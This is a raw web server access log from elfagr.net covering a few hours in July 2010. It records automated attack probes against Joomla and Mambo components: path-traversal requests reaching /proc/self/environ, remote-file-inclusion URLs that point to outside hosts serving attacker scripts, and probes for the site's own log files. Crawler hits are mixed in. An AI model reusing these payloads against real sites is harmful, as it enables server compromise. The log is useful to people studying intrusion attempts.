209.40.100.50 - - [02/Jul/2010:21:48:29 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:49:23 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:49:23 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:49:35 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:49:35 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:49:55 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:49:56 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:21:49:57 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:21:50:08 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
77.92.89.1 - - [02/Jul/2010:21:52:11 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moogoonghwa.kg.kr/bbs/data/guest/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:21:52:08 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:21:53:34 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:55:49 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:56:00 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:55:49 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:56:42 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
77.92.89.1 - - [02/Jul/2010:21:57:43 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moogoonghwa.kg.kr/bbs/data/guest/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:58:45 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:58:55 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:58:55 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:59:50 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:22:04:41 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hap-ki-do.co.at/page//templates/master_orangegrey/log.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:22:04:41 -0700] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hap-ki-do.co.at/page//templates/master_orangegrey/log.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:22:04:41 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hap-ki-do.co.at/page//templates/master_orangegrey/log.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:22:05:09 -0700] "GET /logs/access_091029.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hap-ki-do.co.at/page//templates/master_orangegrey/log.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.elfagr.net"
66.135.41.16 - - [02/Jul/2010:22:05:11 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
69.64.47.65 - - [02/Jul/2010:22:05:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
78.46.71.91 - - [02/Jul/2010:22:11:08 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:22:13:12 -0700] "GET /logs/access_100121.log//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:22:13:22 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:22:13:12 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:22:13:22 -0700] "GET /logs/access_100121.log//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:22:13:12 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:22:13:12 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:22:21:30 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:22:33:22 -0700] "GET /logs/access_100121.log//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:22:33:13 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:22:33:13 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
77.92.89.1 - - [02/Jul/2010:22:34:29 -0700] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.moogoonghwa.kg.kr/bbs/data/guest/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.elfagr.net"
77.92.89.1 - - [02/Jul/2010:22:34:29 -0700] "GET /logs//administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.moogoonghwa.kg.kr/bbs/data/guest/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.elfagr.net"
216.129.119.42 - - [02/Jul/2010:22:36:03 -0700] "GET /index_files/?N=D HTTP/1.1" 200 7688 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:22:36:32 -0700] "GET /logs/access_100429.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:22:37:51 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:22:38:01 -0700] "GET /logs/access_100218.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:22:38:01 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:22:38:01 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:22:38:01 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:22:38:01 -0700] "GET /logs/access_100218.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.44.73.150 - - [02/Jul/2010:22:38:30 -0700] "GET /logs/inurl:index.php?option=com_simpleboardhttp://lady-gaga.es/wp-admin/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.73.150 - - [02/Jul/2010:22:38:31 -0700] "GET /inurl:index.php?option=com_simpleboardhttp://lady-gaga.es/wp-admin/rfiid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:22:39:16 -0700] "GET /logs/access_091119.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:22:39:35 -0700] "GET /logs/access_091119.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
66.135.41.16 - - [02/Jul/2010:22:43:32 -0700] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [02/Jul/2010:22:43:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [02/Jul/2010:22:43:42 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
69.64.47.65 - - [02/Jul/2010:22:43:51 -0700] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
69.64.47.65 - - [02/Jul/2010:22:44:02 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
69.64.47.65 - - [02/Jul/2010:22:43:51 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [02/Jul/2010:22:46:23 -0700] "GET /logs/access_091029.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
69.64.47.65 - - [02/Jul/2010:22:46:31 -0700] "GET /logs/access_091029.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:22:47:56 -0700] "GET /logs/access.log//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:22:47:57 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:22:47:57 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:22:51:42 -0700] "GET /logs/access_100121.log//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
213.171.37.206 - - [02/Jul/2010:22:57:12 -0700] "GET /logs/access_100114.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
213.171.37.206 - - [02/Jul/2010:22:57:12 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
213.171.37.206 - - [02/Jul/2010:22:57:12 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
78.46.71.91 - - [02/Jul/2010:23:02:20 -0700] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
78.46.71.91 - - [02/Jul/2010:23:02:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
78.46.71.91 - - [02/Jul/2010:23:02:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
78.46.71.91 - - [02/Jul/2010:23:05:26 -0700] "GET /logs/access_091029.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
118.123.241.163 - - [02/Jul/2010:23:06:59 -0700] "GET /logs/access_100624.log HTTP/1.0" 200 851968 "http://www.earthday.org/users/42942" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:23:27:15 -0700] "GET /logs/access_090319.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:23:27:19 -0700] "GET /logs/access_090326.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:23:27:22 -0700] "GET /logs/access_090402.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:23:27:24 -0700] "GET /logs/access_090409.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:23:27:25 -0700] "GET /logs/access_090416.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:23:27:37 -0700] "GET /logs/access_090423.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:23:27:29 -0700] "GET /logs/access_090430.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:23:27:29 -0700] "GET /test/index.asp HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:23:27:41 -0700] "GET /logs/access_090507.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:23:27:32 -0700] "GET /logs/access_090514.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:23:27:44 -0700] "GET /logs/access_090521.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
200.125.196.34 - - [02/Jul/2010:23:30:22 -0700] "POST /logs/contact.php HTTP/1.0" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
200.125.196.34 - - [02/Jul/2010:23:30:23 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
77.92.89.1 - - [02/Jul/2010:23:31:09 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.moogoonghwa.kg.kr/bbs/data/guest/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.elfagr.net"
62.149.14.44 - - [02/Jul/2010:23:42:20 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.elfagr.net"
38.113.115.196 - - [02/Jul/2010:23:43:06 -0700] "GET /logs//web2/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
38.113.115.196 - - [02/Jul/2010:23:43:07 -0700] "GET /web2/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
38.113.115.196 - - [02/Jul/2010:23:49:57 -0700] "GET /web2/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
174.142.75.205 - - [02/Jul/2010:23:53:34 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
174.142.75.205 - - [02/Jul/2010:23:53:24 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
77.92.89.1 - - [02/Jul/2010:23:54:29 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.moogoonghwa.kg.kr/bbs/data/guest/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.elfagr.net"
193.231.187.33 - - [02/Jul/2010:23:57:21 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
193.231.187.33 - - [02/Jul/2010:23:57:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
91.142.209.202 - - [03/Jul/2010:00:08:47 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
91.142.209.202 - - [03/Jul/2010:00:08:37 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
91.142.209.202 - - [03/Jul/2010:00:13:21 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
91.142.209.202 - - [03/Jul/2010:00:13:21 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
93.158.149.32 - - [03/Jul/2010:00:13:31 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
95.108.150.235 - - [03/Jul/2010:00:14:40 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "elfagr.net"
95.108.150.235 - - [03/Jul/2010:00:14:31 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "elfagr.net"
95.108.150.235 - - [03/Jul/2010:00:14:31 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.elfagr.net"
